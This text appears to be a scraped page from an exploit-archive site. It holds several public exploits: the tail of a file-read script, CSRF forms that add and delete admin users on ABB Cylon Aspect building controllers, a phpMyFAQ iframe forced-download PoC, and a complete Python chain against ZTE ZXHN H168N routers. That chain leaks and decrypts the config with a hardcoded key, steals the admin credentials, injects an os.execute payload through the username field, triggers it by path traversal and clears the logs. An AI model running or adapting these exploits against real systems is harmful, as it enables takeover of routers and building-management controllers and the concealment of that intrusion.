help="Password for authentication") parser.add_argument("-f", "--file", required=True, help="File path to read (e.g., /etc/passwd)") args = parser.parse_args() session_cookie = authenticate(args.target, args.username, args.password) if session_cookie: exploit(args.target, session_cookie, args.file) if __name__ == "__main__": main()
HireHackking

ABB Cylon Aspect 3.08.02 - Cross-Site Request Forgery (CSRF)

HACKER · %s · %s

<html> <!-- ABB Cylon Aspect 3.08.02 (userManagement.php) Cross-Site Request Forgery Vendor: ABB Ltd. Product web page: https://www.global.abb Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: <=3.08.02 Summary: ASPECT is an award-winning scalable building energy management and control solution designed to allow users seamless access to their building data through standard building protocols including smart devices. Desc: The ABB BMS/BAS controller allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Tested on: GNU/Linux 3.15.10 (armv7l) GNU/Linux 3.10.0 (x86_64) GNU/Linux 2.6.32 (x86_64) Intel(R) Atom(TM) Processor E3930 @ 1.30GHz Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz PHP/7.3.11 PHP/5.6.30 PHP/5.4.16 PHP/4.4.8 PHP/5.3.3 AspectFT Automation Application Server lighttpd/1.4.32 lighttpd/1.4.18 Apache/2.2.15 (CentOS) OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2024-5870 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5870.php CVE ID: CVE-2024-48846 CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48846 21.04.2024 --> P R O J E C T .| | | |'| ._____ ___ | | |. |' .---"| _ .-' '-. | | .--'| || | _| | .-'| _.| | || '-__ | | | || | |' | |. | || | | | | || | ____| '-' ' "" '-' '-.' '` |____ ░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ // Add User/Admin <body> <form action="http://192.168.73.31/userManagement.php" method="POST"> <input type="hidden" name="USER" value="zeroscience" /> <input type="hidden" name="PASSWORD" value="ZSL251" /> <input type="hidden" name="ACTION" value="Add" /> <input type="submit" value="Make me a prince! (php)" /> </form> </body> // Add User/Admin <body> <form action="http://192.168.73.31:7226/servlet/UserManager" method="POST"> <input type="hidden" name="newuser" value="test" /> <input type="hidden" name="password" value="test123" /> <input type="hidden" name="passwordConfirm" value="test123" /> <input type="hidden" name="Insert" value="Add" /> <input type="submit" value="Make me a prince! (java)" /> </form> </body> // Delete User/Admin <body> <form action="http://192.168.73.31:7226/servlet/UserManager" method="POST"> <input type="hidden" name="user9" value="test" /> <input type="hidden" name="remove9" value="1" /> <input type="hidden" name="totalRows" value="9" /> <input type="hidden" name="Delete" value="Delete" /> <input type="submit" value="Destr0y" /> </form> </body> </html>
HireHackking
# Exploit Title: phpMyFAQ v3.2.10 - Unintended File Download Triggered by Embedded Frames # Date: 13 Dec 2024 # Exploit Author: George Chen # Vendor Homepage: https://github.com/thorsten/phpMyFAQ/ # Software Link: https://github.com/thorsten/phpMyFAQ/ # Version: v3.2.10 # Tested on: Mac, Win # CVE : CVE-2024–55889 *Summary* A vulnerability exists in the FAQ Record component of https://github.com/thorsten/phpMyFAQ v3.2.10 where a privileged attacker can trigger a file download on a victim’s machine upon page visit by embedding it in an <iframe> element without user interaction or explicit consent. *Details* In http://localhost/admin/index.php?action=editentry&id=20&lang=en, where a FAQ record is either created or edited, an attacker can insert an iframe, as “source code”, pointing to a prior “malicious” attachment that the attacker has uploaded via FAQ “new attachment” upload, such that any page visits to this FAQ will trigger an automated download (from the edit screen, download is automated; from the faq page view as a normal user, depending on the browser, a pop up confirmation may be presented before the actual download. Firebox browser, for instance, does not require any interactions). [image: image.png] *PoC* 1. create a new FAQ record and upload a “malicious” file — in my case, I uploaded an eicar file. Take note of the uri, ie “index.php?action=attachment&id=2” 2. in the FAQ record, insert a “source code” blob using the “< >” button 3. insert in the following snippet and save FAQ record: <p><iframe src="index.php?action=attachment&id=2"></iframe></p> [image: image.png] 4. Once the edit page reloads, the malicious code will be downloaded onto the local machine without user interaction:[image: image.png] Advisory: https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-m3r7-8gw7-qwvc Disclosure: https://geochen.medium.com/cve-2024-55889-03572ae6c35c
HireHackking
# Exploit Title: ZTE ZXHN H168N 3.1 - RCE via authentication bypass # Author: l34n / tasos meletlidis # Exploit Blog: https://i0.rs/blog/finding-0click-rce-on-two-zte-routers/ import http.client, requests, os, argparse, struct, zlib from io import BytesIO from os import stat from Crypto.Cipher import AES def login(host, port, username, password): headers = { "Content-Type": "application/x-www-form-urlencoded" } data = { "Username": username, "Password": password, "Frm_Logintoken": "", "action": "login" } requests.post(f"http://{host}:{port}/", headers=headers, data=data) def logout(host, port): headers = { "Content-Type": "application/x-www-form-urlencoded" } data = { "IF_LogOff": "1", "IF_LanguageSwitch": "", "IF_ModeSwitch": "" } requests.post(f"http://{host}:{port}/", headers=headers, data=data) def leak_config(host, port): conn = http.client.HTTPConnection(host, port) boundary = "---------------------------25853724551472601545982946443" body = ( f"{boundary}\r\n" 'Content-Disposition: form-data; name="config"\r\n' "\r\n" "\r\n" f"{boundary}--\r\n" ) headers = { "Content-Type": f"multipart/form-data; boundary={boundary}", "Content-Length": str(len(body)), "Connection": "keep-alive", } conn.request("POST", "/getpage.lua?pid=101&nextpage=ManagDiag_UsrCfgMgr_t.lp", body, headers) response = conn.getresponse() response_data = response.read() with open("config.bin", "wb") as file: file.write(response_data) conn.close() def _read_exactly(fd, size, desc="data"): chunk = fd.read(size) if len(chunk) != size: return None return chunk def _read_struct(fd, fmt, desc="struct"): size = struct.calcsize(fmt) data = _read_exactly(fd, size, desc) if data is None: return None return struct.unpack(fmt, data) def read_aes_data(fd_in, key): encrypted_data = b"" while True: aes_hdr = _read_struct(fd_in, ">3I", desc="AES chunk header") if aes_hdr is None: return None _, chunk_len, marker = aes_hdr chunk = _read_exactly(fd_in, chunk_len, desc="AES chunk data") if chunk is None: return None encrypted_data += chunk if marker == 0: break cipher = AES.new(key.ljust(16, b"\0")[:16], AES.MODE_ECB) fd_out = BytesIO() fd_out.write(cipher.decrypt(encrypted_data)) fd_out.seek(0) return fd_out def read_compressed_data(fd_in, enc_header): hdr_crc = zlib.crc32(struct.pack(">6I", *enc_header[:6])) if enc_header[6] != hdr_crc: return None total_crc = 0 fd_out = BytesIO() while True: comp_hdr = _read_struct(fd_in, ">3I", desc="compression chunk header") if comp_hdr is None: return None uncompr_len, compr_len, marker = comp_hdr chunk = _read_exactly(fd_in, compr_len, desc="compression chunk data") if chunk is None: return None total_crc = zlib.crc32(chunk, total_crc) uncompressed = zlib.decompress(chunk) if len(uncompressed) != uncompr_len: return None fd_out.write(uncompressed) if marker == 0: break if enc_header[5] != total_crc: return None fd_out.seek(0) return fd_out def read_config(fd_in, fd_out, key): ver_header_1 = _read_struct(fd_in, ">5I", desc="1st version header") if ver_header_1 is None: return ver_header_2_offset = 0x14 + ver_header_1[4] fd_in.seek(ver_header_2_offset) ver_header_2 = _read_struct(fd_in, ">11I", desc="2nd version header") if ver_header_2 is None: return ver_header_3_offset = ver_header_2[10] fd_in.seek(ver_header_3_offset) ver_header_3 = _read_struct(fd_in, ">2H5I", desc="3rd version header") if ver_header_3 is None: return signed_cfg_size = ver_header_3[3] file_size = stat(fd_in.name).st_size fd_in.seek(0x80) sign_header = _read_struct(fd_in, ">3I", desc="signature header") if sign_header is None: return if sign_header[0] != 0x04030201: return sign_length = sign_header[2] signature = _read_exactly(fd_in, sign_length, desc="signature") if signature is None: return enc_header_raw = _read_exactly(fd_in, 0x3C, desc="encryption header") if enc_header_raw is None: return encryption_header = struct.unpack(">15I", enc_header_raw) if encryption_header[0] != 0x01020304: return enc_type = encryption_header[1] if enc_type in (1, 2): if not key: return fd_in = read_aes_data(fd_in, key) if fd_in is None: return if enc_type == 2: enc_header_raw = _read_exactly(fd_in, 0x3C, desc="second encryption header") if enc_header_raw is None: return encryption_header = struct.unpack(">15I", enc_header_raw) if encryption_header[0] != 0x01020304: return enc_type = 0 if enc_type == 0: fd_in = read_compressed_data(fd_in, encryption_header) if fd_in is None: return fd_out.write(fd_in.read()) def decrypt_config(config_key): encrypted = open("config.bin", "rb") decrypted = open("decrypted.xml", "wb") read_config(encrypted, decrypted, config_key) with open("decrypted.xml", "r") as file: contents = file.read() username = contents.split("IGD.AU2")[1].split("User")[1].split("val=\"")[1].split("\"")[0] password = contents.split("IGD.AU2")[1].split("Pass")[1].split("val=\"")[1].split("\"")[0] encrypted.close() os.system("rm config.bin") decrypted.close() os.system("rm decrypted.xml") return username, password def change_log_level(host, port, log_level): level_map = { "critical": "2", "notice": "5" } headers = { "Content-Type": "application/x-www-form-urlencoded" } data = { "IF_ACTION": "Apply", "_BASICCONIG": "Y", "LogEnable": "1", "LogLevel": level_map[log_level], "ServiceEnable": "0", "Btn_cancel_LogManagerConf": "", "Btn_apply_LogManagerConf": "", "downloadlog": "", "Btn_clear_LogManagerConf": "", "Btn_save_LogManagerConf": "", "Btn_refresh_LogManagerConf": "" } requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0") requests.get(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua") requests.post(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua", headers=headers, data=data) def change_username(host, port, new_username, old_password): headers = { "Content-Type": "application/x-www-form-urlencoded" } data = { "IF_ACTION": "Apply", "_InstID": "IGD.AU2", "Right": "2", "Username": new_username, "Password": old_password, "NewPassword": old_password, "NewConfirmPassword": old_password, "Btn_cancel_AccountManag": "", "Btn_apply_AccountManag": "" } requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_AccountManag_t.lp&Menu3Location=0") requests.get(f"http://{host}:{port}/common_page/accountManag_lua.lua") requests.post(f"http://{host}:{port}/common_page/accountManag_lua.lua", headers=headers, data=data) def clear_log(host, port): headers = { "Content-Type": "application/x-www-form-urlencoded" } data = { "IF_ACTION": "clearlog" } requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0") requests.get(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua") requests.post(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua", headers=headers, data=data) def refresh_log(host, port): headers = { "Content-Type": "application/x-www-form-urlencoded" } data = { "IF_ACTION": "Refresh" } requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0") requests.get(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua") requests.post(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua", headers=headers, data=data) def trigger_rce(host, port): requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_StatusManag_t.lp&Menu3Location=0") requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=..%2f..%2f..%2f..%2f..%2f..%2f..%2fvar%2fuserlog.txt&Menu3Location=0") def rce(cmd): return f"<? _G.os.execute('rm /var/userlog.txt;{cmd}') ?>" def pwn(config_key, host, port): leak_config(host, port) username, password = decrypt_config(config_key) login(host, port, username, password) shellcode = "echo \"pwned\"" payload = rce(shellcode) change_username(host, port, payload, password) refresh_log(host, port) change_log_level(host, port, "notice") refresh_log(host, port) trigger_rce(host, port) clear_log(host, port) change_username(host, port, username, password) change_log_level(host, port, "critical") logout(host, port) print("[+] PoC complete") def main(): parser = argparse.ArgumentParser(description="Run remote command on ZTE ZXHN H168N V3.1") parser.add_argument("--config_key", type=lambda x: x.encode(), default=b"GrWM3Hz&LTvz&f^9", help="Leaked config encryption key from cspd") parser.add_argument("--host", required=True, help="Target IP address of the router") parser.add_argument("--port", required=True, type=int, help="Target port of the router") args = parser.parse_args() pwn(args.config_key, args.host, args.port) if __name__ == "__main__": main()